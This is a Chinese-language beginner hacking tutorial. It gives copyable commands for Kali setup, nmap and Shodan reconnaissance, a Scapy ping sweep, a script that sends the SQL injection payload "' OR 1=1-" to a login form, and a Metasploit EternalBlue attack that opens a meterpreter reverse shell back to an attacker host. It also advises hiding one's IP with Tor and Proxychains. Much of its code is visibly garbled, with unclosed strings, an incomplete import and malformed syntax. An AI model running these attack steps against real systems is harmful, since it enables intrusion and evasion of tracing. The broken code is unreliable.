以下是针对黑客新手的入门教程指南，包含可复制的代码示例、图解步骤及核心知识点解析。内容综合了网络安全基础、工具使用和实战案例，所有代码仅供学习用途，请确保在合法授权环境下操作。

一、基础准备与环境搭建

1. 操作系统与工具安装

bash

安装Kali Linux（建议虚拟机环境）

sudo apt update && sudo apt install -y kali-linux-core

bash

安装Python依赖库（示例：Scapy）

pip install scapy

2. 网络基础

bash

扫描目标IP的开放端口（基础命令）

nmap -sV 192.168.1.1

输出示例：

PORT STATE SERVICE VERSION

80/tcp open http Apache httpd 2.4.29

22/tcp open ssh OpenSSH 7.6p1

二、渗透工具与代码实战

1. Shodan API调用（Python示例）

通过Shodan搜索引擎获取联网设备信息（需API密钥）：

python

import shodan

API_KEY = "YOUR_API_KEY

api = shodan.Shodan(API_KEY)

try:

搜索Apache服务器

results = api.search('apache')

for result in results['matches'][:3]:

print(f"IP: {result['ip_str']}, Port: {result['port']}, Org: {result['org']}")

except shodan.APIError as e:

print(f"Error: {e}")

2. Ping扫描（Scapy实现）

利用Python的Scapy库构造ICMP包进行主机存活检测：

python

from scapy.all import

def ping_scan(target):

ans, unans = sr(IP(dst=target)/ICMP, timeout=2, verbose=0)

for sent, recv in ans:

print(f"[+] {recv.src} is alive")

扫描局域网192.168.1.0/24网段

ping_scan("192.168.1.1/24")

三、实战案例：端口扫描与漏洞利用

1. 手动SQL注入检测

目标：通过HTTP请求探测SQL注入漏洞。

python

import requests

url = "http://example.com/login.php

payload = "' OR 1=1-

data = {

username": "admin",

password": payload

response = requests.post(url, data=data)

if "Welcome" in response.text:

print("[!] SQL注入漏洞存在！")

2. Metasploit框架使用

利用Metasploit进行漏洞利用（以永恒之蓝漏洞为例）：

bash

启动Metasploit

msfconsole

选择漏洞模块

use exploit/windows/smb/ms17_010_eternalblue

配置参数

set RHOSTS 192.168.1.100

set PAYLOAD windows/x64/meterpreter/reverse_tcp

set LHOST 192.168.1.5

执行攻击

exploit

四、学习路径与资源推荐

1. 核心技能树（综合）：

2. 推荐学习资源：

五、注意事项与法律规范

1. 合法授权：所有测试需获得目标系统所有者书面授权。

2. 匿名技术：使用Tor、Proxychains隐藏真实IP。

3. 道德准则：仅用于防御性安全研究，禁止非法入侵。

通过以上内容，新手可逐步掌握从环境搭建到实战渗透的核心技能。完整代码和工具包可通过CSDN、GitHub等平台获取（参考来源）。建议结合靶场环境反复练习，并持续关注漏洞数据库更新。